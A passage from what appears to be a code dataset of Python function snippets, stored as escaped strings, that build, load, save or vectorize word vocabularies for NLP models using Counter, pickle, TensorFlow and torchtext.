vec_outfile_bydoc:\n\t\t\t\t\tprint \"Processing document file......\"\n\t\t\t\t\tline = docfile.readline().strip('\\n')\n\t\t\t\t\twhile line:\n\t\t\t\t\t\twords = line.split()\n\t\t\t\t\t\tnew_words = [x for x in words]\n\t\t\t\t\t\tfor i in range(len(words)):\n\t\t\t\t\t\t\tword_id = self.word2IdVocabulary[words[i]]\n\t\t\t\t\t\t\tsense_vecs = self.vectors[word_id]\n\t\t\t\t\t\t\tsense_num = len(sense_vecs)\n\t\t\t\t\t\t\tif sense_num > 1:\n\t\t\t\t\t\t\t\tcontext_words = []\n\t\t\t\t\t\t\t\tfor x in range(i-int(self.context_num), i+int(self.context_num)+1):\n\t\t\t\t\t\t\t\t\tif x != i and 0 <= x < len(words):\n\t\t\t\t\t\t\t\t\t\tcontext_words.append(words[x])\n\t\t\t\t\t\t\t\tsense_index = self.select_attention(context_words, sense_vecs)\n\t\t\t\t\t\t\t\tword_vec_i = sense_vecs[sense_index]\n\t\t\t\t\t\t\t\tnew_wordi = words[i] + '_' + str(sense_index)\n\t\t\t\t\t\t\t\tself.vector_word_doc[new_wordi.encode('utf-8')] = word_vec_i\n\t\t\t\t\t\t\t\tnew_words[i] = new_wordi\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tword_vec_i = sense_vecs[0]\n\t\t\t\t\t\t\t\tself.vector_word_doc[words[i].encode('utf-8')] = word_vec_i\n\t\t\t\t\t\t\tvec_outfile_bydoc.write(new_words[i] + ' ' + np.array2string(word_vec_i, max_line_width=2000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t formatter={'float_kind': lambda x: '%6f' % x})[1:-1] + '\\n')\n\n\t\t\t\t\t\tdoc_outfile.write(' '.join(new_words) + '\\n')\n\n\t\t\t\t\t\tline = docfile.readline()\n\n\t\treturn self.vector_word_doc", "def _extract_vocab_data(source_files):\n vocab = set()\n\n for source_file in source_files:\n with tf.gfile.Open(source_file) as vocab_file:\n for line in vocab_file:\n tokens = line.split()\n vocab.update(tokens)\n\n return list(vocab)", "def build_vocabulary(self):\n \n for iCount in range(0,len(self.documents)):\n for jCount in range(iCount,len(self.documents[iCount])):\n self.vocabulary.append(self.documents[iCount][jCount])\n\n self.vocabulary = set(self.vocabulary)\n\t\t\n self.vocabulary = sorted(self.vocabulary)\n\t\t#print(\"Value of the vocabulary\")\n self.vocabulary_size = len(self.vocabulary)", "def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)", "def get_vocab(self):\n word2id = {}\n for document in self.docs:\n for word in document:\n if word not in word2id.keys():\n word2id[word] = len(word2id)\n return word2id", "def _build_vocabulary(input_files):\n if FLAGS.vocab_file:\n tf.logging.info(\"Loading existing vocab file.\")\n vocab = collections.OrderedDict()\n with tf.gfile.GFile(FLAGS.vocab_file, mode=\"r\") as f:\n for i, line in enumerate(f):\n word = line.decode(\"utf-8\").strip()\n assert word not in vocab, \"Attempting to add word twice: %s\" % word\n vocab[word] = i\n tf.logging.info(\"Read vocab of size %d from %s\",\n len(vocab), FLAGS.vocab_file)\n return vocab\n\n tf.logging.info(\"Creating vocabulary.\")\n num = 0\n wordcount = collections.Counter()\n for input_file in input_files:\n tf.logging.info(\"Processing file: %s\", input_file)\n for sentence in tf.gfile.FastGFile(input_file):\n wordcount.update(sentence.split())\n\n num += 1\n if num % 1000000 == 0:\n tf.logging.info(\"Processed %d sentences\", num)\n\n tf.logging.info(\"Processed %d sentences total\", num)\n\n words = wordcount.keys()\n freqs = wordcount.values()\n sorted_indices = np.argsort(freqs)[::-1]\n\n vocab = collections.OrderedDict()\n vocab[special_words.EOS] = special_words.EOS_ID\n vocab[special_words.UNK] = special_words.UNK_ID\n for w_id, w_index in enumerate(sorted_indices[0:FLAGS.num_words - 2]):\n vocab[words[w_index]] = w_id + 2 # 0: EOS, 1: UNK.\n\n tf.logging.info(\"Created vocab with %d words\", len(vocab))\n\n vocab_file = os.path.join(FLAGS.output_dir, \"vocab.txt\")\n with tf.gfile.FastGFile(vocab_file, \"w\") as f:\n f.write(\"\\n\".join(vocab.keys()))\n tf.logging.info(\"Wrote vocab file to %s\", vocab_file)\n\n word_counts_file = os.path.join(FLAGS.output_dir, \"word_counts.txt\")\n with tf.gfile.FastGFile(word_counts_file, \"w\") as f:\n for i in sorted_indices:\n f.write(\"%s %d\\n\" % (words[i], freqs[i]))\n tf.logging.info(\"Wrote word counts file to %s\", word_counts_file)\n\n return vocab", "def load_preprocessed(self):\n with open(self.words_vocab_file, 'rb') as f:\n self.word_to_id, self.unk_word_list = pickle.load(f)\n self.word_vocab_size = len(self.word_to_id)\n\n if self.unit != \"word\":\n with open(self.sub_vocab_file, 'rb') as f:\n if self.unit == \"char\":\n self.max_word_len = self.get_max_word_length(self.word_to_id) + 2\n self.char_to_id, self.unk_char_list, self.max_word_len = pickle.load(f)\n self.subword_vocab_size = len(self.char_to_id)\n elif self.unit == \"char-ngram\":\n self.ngram_to_id, self.unk_char_list, self.unk_ngram_list, \\\n self.max_ngram_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.ngram_to_id)\n elif self.unit == \"morpheme\":\n self.morpheme_to_id, self.unk_char_list, self.unk_morph_list, \\\n self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n elif self.unit == \"oracle\":\n self.morpheme_to_id, self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n else:\n sys.exit(\"Unknown unit\")", "def vocab():\n symbols = DEFAULT_SPECIAL_SYMBOLS + [\"mouse\", \"dog\", \"tree\"]\n return Vocabulary(symbols)", "def load_vocab(self):\n keys = []\n values = []\n with open(self.embed_file, 'r') as f:\n lines = f.readlines()\n\n for line in lines:\n key = line.split(\" \")[0]\n value = line.split(\" \")[1:]\n keys.append(key)\n values.append(value)\n # form <dict>\n # vocab = dict(zip(keys, values))\n return keys, values", "def get_vocab():\n if data_dir is not None and vocab_filename is not None:\n vocab_filepath = os.path.join(data_dir, vocab_filename)\n if tf.gfile.Exists(vocab_filepath):\n tf.logging.info(\"Found vocab file: %s\", vocab_filepath)\n vocab_symbolizer = text_encoder.SubwordTextEncoder(vocab_filepath)\n return vocab_symbolizer\n else:\n raise ValueError(\"Vocab file does not exist: %s\" % vocab_filepath)\n return None", "def create_vocabulary(sentences, path):\n print('creating vocab..')\n\n word_dict = dict(); vocabulary = dict()\n for sentence in sentences:\n for word in nltk.word_tokenize(sentence):\n if word not in word_dict:\n word_dict[word] = ''\n word_dict['<s>'] = ''\n word_dict['</s>'] = ''\n\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word, vec = line.split(' ', 1)\n if word in word_dict:\n vocabulary[word] = np.fromstring(vec, sep=' ')\n\n print('vocabulary was created successfully!')\n return vocabulary", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv.append('<pad>')\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def get_vocab(data_set):\n vocab = {'PADDING': 0, 'PUNCT': 1}\n inv_vocab = {0: 'PADDING', 1: 'PUNCT'}\n wid = 2\n max_len = -1\n for record in data_set:\n assert 'words' in record\n words = record['words']\n if len(words) > max_len:\n max_len = len(words)\n for w in words:\n if w not in vocab:\n vocab[w] = wid\n inv_vocab[wid] = w\n wid += 1\n print(\"The maximum length of the sentence is %d\" % max_len)\n print(\"Find %s different words in the dataset\" % len(vocab))\n char_string = ''\n for w in vocab:\n char_string += w\n chars = list(set(char_string))\n cid, char_vocab = 0, {}\n for ch in chars:\n if ch not in char_vocab:\n char_vocab[ch] = cid\n cid += 1\n print(\"Find %s different chars in the dataset\" % len(char_vocab))\n return vocab, char_vocab, max_len", "def get_vocabulary(\n cfg: DatasetConfig) -> Tuple[seqio.Vocabulary, seqio.Vocabulary]:\n if cfg.module:\n warnings.warn(\n 'The use of `DatasetConfig.module` and `MIXTURE_OR_TASK_MODULE` is '\n 'deprecated in favor of importing the module directly or via gin.',\n DeprecationWarning)\n import_module(cfg.module)\n\n provider = seqio.get_mixture_or_task(cfg.mixture_or_task_name)\n features = provider.output_features\n\n if 'inputs' in features and 'targets' in features:\n return (features['inputs'].vocabulary, features['targets'].vocabulary)\n\n # If a mix of PassThroughVocabularies and other Vocabularies are specified,\n # use the non-PassThroughVocabularies.\n # TODO(b/185912004): Remove this once a more general solution is implemented.\n vocabularies = list(\n f.vocabulary\n for f in features.values()\n if not isinstance(f.vocabulary, seqio.PassThroughVocabulary))\n\n # Otherwise, if all of the vocabs are PassThroughVocabularies, use those.\n if not vocabularies:\n vocabularies = list(f.vocabulary for f in features.values())\n\n # If there still aren't any vocabularies, raise an error.\n if not vocabularies:\n raise ValueError('\"inputs\" and \"targets\" are not both present, and '\n 'no vocabularies were set for any features.')\n\n first_vocab = vocabularies[0]\n for vocab in vocabularies[1:]:\n if vocab != first_vocab:\n raise ValueError('\"inputs\" and \"targets\" are not both present, and '\n 'vocabularies are different.')\n return (first_vocab, first_vocab)", "def generate_vocabulary():\n stop_words = load_stop_words()\n words = ' '.join(generate_corpus()).split()\n print(len(words))\n vocabulary = {}\n for word in words:\n if word in stop_words:\n continue\n if word in vocabulary.keys():\n vocabulary[word] += 1\n else:\n vocabulary[word] = 1\n vocabulary = dict(sorted(vocabulary.items(), key=lambda x: x[1], reverse=True))\n return vocabulary", "def build_vocab(train_dir, vocab_dir, vocab_size=5000):\n data_train, _ = read_file(train_dir)\n\n all_data = []\n for content in data_train:\n all_data.extend(content)\n\n counter = Counter(all_data)\n count_pairs = counter.most_common(vocab_size-1)\n words, _ = list(zip(*count_pairs))\n\n open_file(vocab_dir,mode='w').write('\\n'.join(words)+'\\n')", "def getLearningData(corpus, vocab):\n labels, data = [], []\n global importantFrequentWordDic\n for sent in corpus.trainingSents:\n trans = sent.initialTransition\n while trans and trans.next:\n tokenIdxs, posIdxs = getTransData(trans, vocab)\n data.append(np.asarray(np.concatenate((tokenIdxs, posIdxs))))\n labels.append(trans.next.type.value if trans.next.type.value <= 2 else (\n trans.next.type.value if enableCategorization else 3))\n trans = trans.next\n return labels, data", "def create_vocab(vocab_size):\n vocab_dict = tff.simulation.datasets.stackoverflow.load_word_counts(\n cache_dir='/tmp')\n return list(vocab_dict.keys())[:vocab_size]", "def build_dataset(words):\n count = []\n # count.extend(collections.Counter(words).most_common(n_words - 1))\n count.extend(collections.Counter(words).most_common())\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n data = list()\n # unk_count = 0\n for word in words:\n index = dictionary.get(word, 0)\n # if index == 0: # dictionary['UNK']\n # unk_count += 1\n data.append(index)\n # count[0][1] = unk_count\n reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n data = [data[::2],data[1::2]]\n new_data = list()\n for i in range(len(data[0])):\n new_data.append([data[0][i],data[1][i]])\n data = new_data\n vocabulary_size = len(dictionary)\n print(\"\\n\\ndictionary size = \")\n print(len(dictionary))\n return data, count, dictionary, reversed_dictionary, vocabulary_size", "def build_words_dataset(words, vocabulary_size=50000, printable=True):\n import collections\n count = [['UNK', -1]]\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n data = list()\n unk_count = 0\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n index = 0 # dictionary['UNK']\n unk_count += 1\n data.append(index)\n count[0][1] = unk_count\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n if printable:\n print('Real vocabulary size %d' % len(collections.Counter(words).keys()))\n print('Limited vocabulary size {}'.format(vocabulary_size))\n assert len(collections.Counter(words).keys()) >= vocabulary_size , \\\n \"Read vocabulary size can be less than limited vocabulary size\"\n return data, count, dictionary, reverse_dictionary", "def _load_vocabulary(self) -> Dict[str, int]:\n\n df_existing_vocab = self._db_connection.get_dataframe(table_name='tfidf_vocabulary', schema='encoded_articles')\n\n df_existing_vocab.set_index('word', inplace=True)\n\n return df_existing_vocab['feature_matrix_index'].to_dict()", "def build_vocab(sentences, saved_vocabulary_inv):\n if saved_vocabulary_inv:\n vocabulary_inv = saved_vocabulary_inv\n else:\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def getVocabList():\n vocabList = pd.read_csv(os.path.join(folder, 'vocab.txt'),\n delimiter='\\t',\n names=['index', 'vocab'],\n index_col='index')\n return vocabList", "def load_data():\n # Load and preprocess data\n x_text_train1, x_text_train2, x_text_dev1, x_text_dev2, y_train, y_dev = load_data_and_labels_without_shuffled()\n\n x_text_train1 = split_sentence(x_text_train1)\n x_text_train2 = split_sentence(x_text_train2)\n x_text_dev1 = split_sentence(x_text_dev1)\n x_text_dev2 = split_sentence(x_text_dev2)\n\n x_text_train1 = pad_sentences(x_text_train1)\n x_text_train2 = pad_sentences(x_text_train2)\n x_text_dev1 = pad_sentences(x_text_dev1)\n x_text_dev2 = pad_sentences(x_text_dev2)\n\n # sentences = x_text_train1 + x_text_train2 + x_text_dev1 + x_text_dev2\n # vocabulary, vocabulary_inv = build_vocab(sentences)\n # x_text_train1 = build_input_data(x_text_train1, vocabulary)\n # x_text_train2 = build_input_data(x_text_train2, vocabulary)\n # x_text_dev1 = build_input_data(x_text_dev1, vocabulary)\n # x_text_dev2 = build_input_data(x_text_dev2, vocabulary)\n\n x_train1 = sentence_word2vec(x_text_train1)\n x_train2 = sentence_word2vec(x_text_train2)\n x_dev1 = sentence_word2vec(x_text_dev1)\n x_dev2 = sentence_word2vec(x_text_dev2)\n\n y_train = np.array(y_train)\n y_dev = np.array(y_dev)\n # return [x_text_train1, x_text_train2, x_text_dev1, x_text_dev2, y_train, y_dev, vocabulary, vocabulary_inv]\n\n return [x_train1, x_train2, x_dev1, x_dev2, y_train, y_dev]", "def load_vocab(vocab):\r\n\tvocab = [line.split()[0] for line in open(\r\n\t\t'{}{}'.format(pm.vocab_path, vocab), 'r', encoding='utf-8').read().splitlines()\r\n\t\t\t if int(line.split()[1]) >= pm.word_limit_size]\r\n\tword2idx_dic = {word: idx for idx, word in enumerate(vocab)}\r\n\tidx2word_dic = {idx: word for idx, word in enumerate(vocab)}\r\n\treturn word2idx_dic, idx2word_dic", "def preprocess(self):\n self.word_to_id, self.unk_word_list = self.build_vocab(mode=\"word\")\n self.word_vocab_size = len(self.word_to_id)\n self.max_word_len = self.get_max_word_length(self.word_to_id)\n # Do not write the same file again\n if not os.path.exists(self.words_vocab_file):\n with open(self.words_vocab_file, 'wb') as f:\n pickle.dump((self.word_to_id, self.unk_word_list), f)\n if self.unit != \"word\":\n self.preprocess_sub_units()", "def build_vocab(vocab_size, text_vector):\n vocab = Counter()\n for text in text_vector:\n for word in text.split(' '):\n vocab[word.lower()]+=1\n vocab = dict(vocab.most_common(vocab_size))\n return vocab", "def vocab(self) -> Vocabulary:\n return self._model.vocab", "def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)", "def tokenize_text(dataset):\n tokenizer = tfds.features.text.Tokenizer()\n vocabulary = set() # removes duplicates\n for _, reviews in dataset.enumerate():\n review_text = reviews['data']\n reviews_tokens = tokenizer.tokenize(review_text.get('review_body').numpy())\n # add to vocabulary set\n vocabulary.update(reviews_tokens)\n\n return vocabulary", "def build_vocab(data, min_token_instances, verbose=True):\r\n token_counter = Counter()\r\n print('Building vocab...')\r\n pbar = mmcv.ProgressBar(len(data))\r\n for img in data:\r\n for region in img['relationships']:\r\n if region['tokens'] is not None:\r\n token_counter.update(region['tokens'])\r\n pbar.update()\r\n\r\n vocab = set()\r\n for token, count in token_counter.items():\r\n if count >= min_token_instances:\r\n vocab.add(token)\r\n\r\n if verbose:\r\n print('\\n Keeping %d / %d tokens with enough instances'\r\n % (len(vocab), len(token_counter)))\r\n\r\n if len(vocab) < len(token_counter):\r\n vocab.add('<UNK>')\r\n if verbose:\r\n print('adding special <UNK> token.')\r\n else:\r\n if verbose:\r\n print('no <UNK> token needed.')\r\n print('VOCAB num: %s'%(len(vocab)))\r\n return vocab", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def get_vocab(self):\n vocab, char_vocab = set(), set()\n\n for document in self.docs:\n vocab.update(document.tokens)\n char_vocab.update([char\n for word in document.tokens\n for char in word])\n\n return vocab, char_vocab", "def build_vocab(raw_data, max_size=None):\n data = [w for doc in tokenize_keras(raw_data) for w in doc]\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(),\n key=lambda x: (-x[1], x[0]))\n if max_size: count_pairs = count_pairs[:max_size]\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n word_to_id[UNKNOWN_WORD] = len(word_to_id)\n word_to_id[PAD_WORD] = len(word_to_id)\n return word_to_id", "def get_vocab(data, nb_words=50000, min_nb=10, remove_stop_words = True):\n\n\n # Put everything into onw long string\n data = [item for sublist in list(data.values()) for item in sublist]\n data = \" \".join(data)\n\n # Do a bit of steaming\n data = remove_punctuations(data)\n vocab = Counter(data)\n\n # Remove the stop words\n new_vocab = vocab.copy()\n for key, value in vocab.items():\n if remove_stop_words and key in stopwords:\n del new_vocab[key]\n if value < min_nb:\n del new_vocab[key]\n\n vocab = new_vocab\n\n # Keep the most common words\n vocab = Counter(dict(vocab.most_common(nb_words)))\n\n # Extract a mapping\n mapping = {}\n mapping[1] = \"--UNK--\"\n mapping[\"--UNK--\"] = 1\n for i, word in enumerate(sorted(vocab.keys())):\n mapping[i + 2] = word\n mapping[word] = i + 2\n\n return vocab, mapping", "def create_vocab(input_iter, min_frequency):\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(\n FLAGS.max_sentence_len,\n min_frequency=min_frequency,\n tokenizer_fn=tokenizer_fn)\n\n vocab_processor.fit(input_iter)\n return vocab_processor", "def load_data():\n # Load and preprocess data\n sentences, labels = load_data_and_labels()\n sentences_padded = pad_sentences(sentences)\n vocabulary, vocabulary_inv = build_vocab(sentences_padded)\n x, y = build_input_data(sentences_padded, labels, vocabulary)\n return [x, y, vocabulary, vocabulary_inv]", "def vocabfn(self):\n return Vocab(self.COMMON_ATOMS)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def generate_vocabSet(original_data):\n education = convert_key(original_data, 'education')\n experience = convert_key(original_data, 'experience')\n header = convert_key(original_data, 'header')\n vocabSet = []\n vocabSet.append(education)\n vocabSet.append(experience)\n vocabSet.append(header)\n vocabSet = [y for i in vocabSet for y in i]\n vocabSet = list(set(vocabSet))\n return vocabSet", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"r\") as f:\n counter = 0\n for line in f:\n counter += 1\n line = line.strip().split('\\t')[0]\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, \"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n sorted_vocab = sorted(vocab, key=vocab.get, reverse=True)\n vocab_list = _START_VOCAB + sorted_vocab\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), max_vocabulary_size, vocab[sorted_vocab[max_vocabulary_size - len(_START_VOCAB)]] ) )\n else:\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), len(vocab), 0))\n\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + \"\\n\")", "def vocab(self: TokenMatcher) -> Vocab:\n return self._searcher.vocab", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common() if x[1] > 1]\n vocabulary_inv += ['$']\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def process_vocabulary(args, data, quiet=False):\n if not quiet:\n out(args.logfile, \"initializing vacabularies... \", end=\"\")\n seq_vocab = vocabulary.Vocabulary()\n bracket_vocab = vocabulary.Vocabulary()\n # loop_type_vocab = vocabulary.Vocabulary()\n\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n vocab.index(START)\n vocab.index(STOP)\n for x in data[:100]:\n seq = x[\"sequence\"]\n dot = x[\"structure\"]\n # loop = x[\"predicted_loop_type\"]\n for character in seq:\n seq_vocab.index(character)\n for character in dot:\n bracket_vocab.index(character)\n # for character in loop:\n # loop_type_vocab.index(character)\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n # vocab.index(UNK)\n vocab.freeze()\n if not quiet:\n out(args.logfile, \"done.\")\n\n def print_vocabulary(name, vocab):\n # special = {START, STOP, UNK}\n special = {START, STOP}\n out(args.logfile, \"{}({:,}): {}\".format(\n name, vocab.size,\n sorted(value for value in vocab.values if value in special) +\n sorted(value for value in vocab.values if value not in special)))\n\n if not quiet:\n print_vocabulary(\"Sequence\", seq_vocab)\n print_vocabulary(\"Brackets\", bracket_vocab)\n return seq_vocab, bracket_vocab", "def load_vocab(fn):\n return corpora.Dictionary.load(fn)", "def get_weibo_data(vocab_file, vector_file):\n if os.path.exists(\"word_misc.pkl\"):\n return cPickle.load(open(\"word_misc.pkl\", \"rb\"))\n\n word_misc, word2id, id2word = {}, {}, {}\n word_count = 0\n\n # vocab file\n print \"Building vocabulary ...\"\n for lines in open(vocab_file).readlines():\n word = lines.split()[0]\n if not is_unwanted_words(word, ['', '\\n']):\n word2id[word] = word_count\n id2word[word_count] = word\n word_count += 1\n word2id['_START'] = word_count\n id2word[word_count] = '_START'\n word_count += 1\n word2id['_END'] = word_count\n id2word[word_count] = '_END'\n word_count += 1\n word2id['_UNK'] = word_count\n id2word[word_count] = '_UNK'\n word_count += 1\n word2id['_MASK'] = word_count\n id2word[word_count] = '_MASK'\n word_count += 1\n print \"Vocabulary size:\", word_count\n\n # Initialization is refered to in https://www.tensorflow.org/versions/r0.7/tutorials/word2vec/index.html\n word_emb = (1/np.sqrt(word_count)*(2*np.random.rand(word_count, options['embedding_size']) - 1)).tolist()\n\n # load word vectors\n for lines in open(vector_file).readlines()[1:]:\n word = lines.split()[0]\n #if word == '</s>' or word not in word2id.keys():\n # continue\n if word not in word2id.keys():\n continue\n ids = word2id[word]\n #print ids, lines, len(word_emb)\n word_emb[ids] = [float(w) for w in lines.split()[1:]]\n\n print len(word_emb), \"words have been loaded with\", len(word_emb[0]), \"dimensions\"\n\n # load word misc\n word_misc['id2word'] = id2word\n word_misc['word2id'] = word2id\n word_misc['word_count'] = word_count\n word_misc['word_emb'] = word_emb\n cPickle.dump(word_misc, open(\"word_misc.pkl\", \"wb\"))\n print \"Dump complete.\"\n return word_misc", "def create_vocab(df, datapath):\n if os.path.isfile(\"vocab_max_l.p\"):\n o = cPickle.load(open(\"vocab_max_l.p\", \"rb\")) # search if vocab file is already existing\n vocab = o[0]\n max_l = o[1]\n else:\n vocab = defaultdict(int)\n max_l = 0\n for d in read_data_files(df.file, datapath):\n words = clean_str(d).split(\" \")\n if len(words) > max_l:\n max_l = len(words)\n\n for w in words:\n vocab[w] += 1\n\n cPickle.dump([vocab, max_l], open(\"vocab_max_l.p\", \"wb\"))\n return vocab, max_l", "def _build_vocab(self, \n data_path : str,\n vocab_size: int=3500, \n unk_token : str=\"<UNK>\", \n pad_token : str=\"<PAD>\",\n mode : str=\"tokenize\",\n test : bool=False,\n vocab=None\n ): \n # read data form file\n sentences, labels, targets_list, word_counter = self._read_data(data_path, mode=mode, bert=True, task=self.task)\n\n # build vocabulary on data if none is given\n if vocab is None:\n print(\"\\n[dataset]: building vocabulary ...\")\n # load pretrained GloVe word embeddings\n glove_vec = torchtext.vocab.GloVe(name=\"6B\", dim=100, unk_init=torch.FloatTensor.normal_)\n self.vocabulary = Vocab(\n counter=word_counter, # (word,freq) mapping\n max_size=vocab_size, # vocabulary max size\n specials=[pad_token,unk_token], # special tokens\n vectors=glove_vec # pre-trained embeddings\n )\n # ensure pad_token embedding is a zeros tensor\n self.vocabulary.vectors[0] = torch.zeros([glove_vec.dim]).float()\n print(\"Embedding vectors:\", self.vocabulary.vectors.size())\n\n else:\n print(\"\\n[dataset]: (dev) using train vocabulary ...\")\n self.vocabulary = vocab\n\n # create data samples -> (x, y)\n self.samples = []\n\n if mode == \"tokenize\":\n for toks, tags, terms in zip(sentences,labels,targets_list):\n tokens_idxs = []\n for t in toks:\n try:\n idx = self.vocabulary.stoi[t]\n except:\n idx = self.vocabulary.stoi[unk_token]\n\n assert len(toks) == len(tags)\n tokens_idxs.append(idx)\n\n #print(toks, tags)\n self.samples.append((tokens_idxs,tags,toks,self._tokenize_line(terms)))\n\n elif mode == \"raw\":\n # use raw text as input (required by transformers)\n if not test:\n for s, l, tgt in zip(sentences,labels,targets_list):\n self.samples.append((s,l,tgt))\n else:\n for s, l, tgt, tok in zip(sentences,labels,targets_list, word_counter):\n self.samples.append((s,l,tgt,tok))\n return", "def save_vocabulary(self):\n out_vocab_file = 'xlnet_vocab.txt'\n if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):\n copyfile(self.vocab_file, out_vocab_file)\n\n return (out_vocab_file,)", "def vectorize_vocabulary(train_tweets_dict, test_tweets_dict):\n\n print(\"Vectorizing ADRMine data vocabulary...\")\n\n tfidf_vectorizer = TfidfVectorizer()\n corpus = []\n\n for i, (k, v) in enumerate(train_tweets_dict.items()):\n corpus.append(v.lower())\n\n for i, (k, v) in enumerate(test_tweets_dict.items()):\n corpus.append(v.lower())\n\n tfidf_vectorizer.fit_transform(corpus)\n #print(Tfidf_vect.vocabulary_)\n #print(len(Tfidf_vect.vocabulary_))\n #print(Tfidf_vect.idf_)\n print(\" size of vocabulary: {}\".format(len(tfidf_vectorizer.vocabulary_)))\n return tfidf_vectorizer", "def get_instruction_vocabulary(self) -> List[str]:\n vocab_dict: Dict[str, int] = {}\n for game_id, game in self._train_games.items():\n if game_id in self._update_ids:\n for example in game.get_examples():\n for token in example.get_instruction():\n if token not in vocab_dict:\n vocab_dict[token] = 0\n vocab_dict[token] += 1\n\n return [wordtype for wordtype, count in vocab_dict.items() if\n count >= self._args.get_minimum_wordtype_occurrence()]", "def gen_dtm(text_data, vocab):\n vectorizer = sklearn.feature_extraction.text.CountVectorizer(\n vocabulary = vocab)\n return vectorizer.fit_transform(text_data)", "def vocab_from_text_corpus(test_corpus: Iterable) -> Set[str]:\n return set(VocabUtils.flatten(test_corpus))", "def build_train_data(self,data_folder, cv=10, clean_string=False):\n revs = []\n\n vocab = defaultdict(float)\n print data_folder\n with codecs.open( data_folder, 'rb') as fi:\n for line in fi.readlines():\n line = line.decode('utf-8')\n parts = line.split(\"\\n\")[0].split(\"\\t\")\n if len(parts) > 1:\n sent = parts[1]\n rev = []\n rev.append(sent.strip())\n\n if clean_string:\n orig_rev = self.dc.clean_str(\" \".join(rev))\n else:\n orig_rev = \" \".join(rev).lower()\n #print orig_rev\n words = set(orig_rev.split())\n for word in words:\n vocab[word.lower()] += 1\n if len(orig_rev.split()) < 50 :\n\n datum = {\"y\":int(parts[0]),\n \"text\": orig_rev,\n \"num_words\": len(orig_rev.split()),\n \"split\": np.random.randint(0,cv)}\n revs.append(datum)\n # else:\n # print orig_rev\n\n\n return revs, vocab", "def buildVocabulary(paragraphs, verbose=True):\n 